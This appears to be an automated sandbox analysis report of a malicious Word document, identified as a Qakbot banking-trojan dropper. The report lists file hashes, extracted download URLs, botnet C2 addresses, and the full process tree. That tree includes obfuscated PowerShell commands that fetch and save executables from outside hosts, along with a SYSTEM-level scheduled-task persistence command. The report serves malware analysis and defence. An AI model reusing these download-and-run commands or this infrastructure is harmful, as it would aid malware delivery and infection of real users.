Overview

overview

10

Static

static

8

AGRMT_0605...95.doc

windows7_x64

10

AGRMT_0605...95.doc

windows10_x64

10

Analysis

  • max time kernel
    140s
  • max time network
    146s
  • platform
    windows10_x64
  • resource
    win10v200430
  • submitted
    09-06-2020 11:55

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    AGRMT_06052020_195.doc

  • Size

    220KB

  • MD5

    bc8cf7a3c840dc88cfa89f69852e46e6

  • SHA1

    1528a5750c9072ebbc963687079c010b18240c9e

  • SHA256

    e0dffa6bd2f4dd302690fc57b659149f59c394b4235edf33bf6a10ba0873dafc

  • SHA512

    c2ed63d68e2f23917f448e8bda38058f7c6c02fce9b6fdd474983bed4e0e089759407d214f5eb307eb58101017a9918fae0307bdd10d1634ff26084eed7ea317

Score
10/10
trojanbankerstealerqakbot

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://salwadm.com/tcphx/8888888.png

Extracted

Language
ps1
Source
URLs
exe.dropper

http://flipkenya.com/nujazbwrhjy/8888888.png

Extracted

Family

qakbot

Botnet

spx135

Campaign

1591627649

C2

89.32.216.156:443

74.222.204.82:443

24.183.39.93:443

97.93.211.17:443

80.14.209.42:2222

96.35.170.82:2222

151.73.124.242:443

98.110.231.63:443

108.227.161.27:995

173.3.132.17:995

31.5.41.52:443

24.122.228.88:443

5.107.208.94:2222

76.185.136.58:443

50.29.166.232:995

73.210.114.187:443

92.114.107.193:995

24.43.22.220:993

50.247.230.33:995

72.142.106.198:465

Signatures

  • Blacklisted process makes network request 2 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Qakbot/Qbot

    Qbot or Qakbot is a sophisticated worm with banking capabilities.

    trojanbankerstealerqakbot
  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs
  • Executes dropped EXE 4 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Process spawned unexpected child process 7 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\AGRMT_06052020_195.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Suspicious use of FindShellTrayWindow
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of WriteProcessMemory
    • Suspicious use of SetWindowsHookEx
    PID:1164
    • C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c mkdir C:\Users\Public\tmpdir
      2⤵
      • Process spawned unexpected child process
      PID:3992
    • C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /C choice /C Y /N /D Y /T 1 & Del C:\Users\Public\tmp.bat
      2⤵
      • Process spawned unexpected child process
      PID:3332
      • C:\Windows\system32\choice.exe
        choice /C Y /N /D Y /T 1
        3⤵
          PID:1592
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL3NhbHdhZG0uY29tL3RjcGh4Lzg4ODg4ODgucG5n')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:\Users\Public\1.txt
        2⤵
        • Process spawned unexpected child process
        PID:3416
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL3NhbHdhZG0uY29tL3RjcGh4Lzg4ODg4ODgucG5n')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e')
          3⤵
          • Blacklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3388
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:\Users\Public\tmpdir\tmps1.bat & del C:\Users\Public\1.txt
        2⤵
        • Process spawned unexpected child process
        PID:2352
        • C:\Windows\system32\choice.exe
          choice /C Y /N /D Y /T 65
          3⤵
            PID:1096
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL2ZsaXBrZW55YS5jb20vbnVqYXpid3JoankvODg4ODg4OC5wbmc=')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '2' + '.e' + 'x' + 'e') >C:\Users\Public\2.txt
          2⤵
          • Process spawned unexpected child process
          PID:1532
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL2ZsaXBrZW55YS5jb20vbnVqYXpid3JoankvODg4ODg4OC5wbmc=')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '2' + '.e' + 'x' + 'e')
            3⤵
            • Blacklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:764
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:\Users\Public\tmpdir\tmps2.bat & del C:\Users\Public\2.txt
          2⤵
          • Process spawned unexpected child process
          PID:3972
          • C:\Windows\system32\choice.exe
            choice /C Y /N /D Y /T 65
            3⤵
              PID:1608
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c C:\Users\Public\tmpdir\tmps2.bat
            2⤵
            • Process spawned unexpected child process
            PID:3532
            • C:\Windows\System32\cmd.exe
              C:\Windows\System32\cmd.exe /C choice /C Y /N /D Y /T 2
              3⤵
                PID:3436
                • C:\Windows\system32\choice.exe
                  choice /C Y /N /D Y /T 2
                  4⤵
                    PID:3936
                • C:\Users\Public\tmpdir\file2.exe
                  C:\Users\Public\tmpdir\file2.exe
                  3⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  • Executes dropped EXE
                  PID:3420
                  • C:\Users\Public\tmpdir\file2.exe
                    C:\Users\Public\tmpdir\file2.exe /C
                    4⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Checks SCSI registry key(s)
                    • Executes dropped EXE
                    PID:3416
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Armbughouj\nniglk.exe
                    C:\Users\Admin\AppData\Roaming\Microsoft\Armbughouj\nniglk.exe
                    4⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious behavior: MapViewOfSection
                    • Suspicious use of WriteProcessMemory
                    • Executes dropped EXE
                    PID:1992
                    • C:\Users\Admin\AppData\Roaming\Microsoft\Armbughouj\nniglk.exe
                      C:\Users\Admin\AppData\Roaming\Microsoft\Armbughouj\nniglk.exe /C
                      5⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Checks SCSI registry key(s)
                      • Executes dropped EXE
                      PID:1612
                    • C:\Windows\SysWOW64\explorer.exe
                      C:\Windows\SysWOW64\explorer.exe
                      5⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1912
                  • C:\Windows\SysWOW64\schtasks.exe
                    "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn txtmhfdmqz /tr "\"C:\Users\Public\tmpdir\file2.exe\" /I txtmhfdmqz" /SC ONCE /Z /ST 14:09 /ET 14:21
                    4⤵
                    • Creates scheduled task(s)
                    PID:3928

            Network

            MITRE ATT&CK Matrix ATT&CK v6

            Initial Access

            Execution

            Scheduled Task

            1
            T1053

            Persistence

            Scheduled Task

            1
            T1053

            Privilege Escalation

            Scheduled Task

            1
            T1053

            Defense Evasion

            Credential Access

            Discovery

            Query Registry

            3
            T1012

            System Information Discovery

            3
            T1082

            Peripheral Device Discovery

            1
            T1120

            Lateral Movement

            Collection

            Exfiltration

            Command and Control

            Impact

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
              Download Submit
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              Download Submit
            • C:\Users\Admin\AppData\Roaming\Microsoft\Armbughouj\nniglk.dat
              Download Submit
            • C:\Users\Admin\AppData\Roaming\Microsoft\Armbughouj\nniglk.exe
              Download Submit
            • C:\Users\Admin\AppData\Roaming\Microsoft\Armbughouj\nniglk.exe
              Download Submit
            • C:\Users\Admin\AppData\Roaming\Microsoft\Armbughouj\nniglk.exe
              Download Submit
            • C:\Users\Public\1.txt
              Download Submit
            • C:\Users\Public\tmp.bat
              Download Submit
            • C:\Users\Public\tmpdir\file2.exe
              Download Submit
            • C:\Users\Public\tmpdir\file2.exe
              Download Submit
            • C:\Users\Public\tmpdir\file2.exe
              Download Submit
            • C:\Users\Public\tmpdir\tmps2.bat
              Download Submit
            • memory/1612-19-0x00000000027E0000-0x00000000027E1000-memory.dmp
              Filesize

              4KB

              Download
            • memory/1992-20-0x00000000022D0000-0x000000000230A000-memory.dmp
              Filesize

              232KB

              Download
            • memory/3416-15-0x0000000002700000-0x0000000002701000-memory.dmp
              Filesize

              4KB

              Download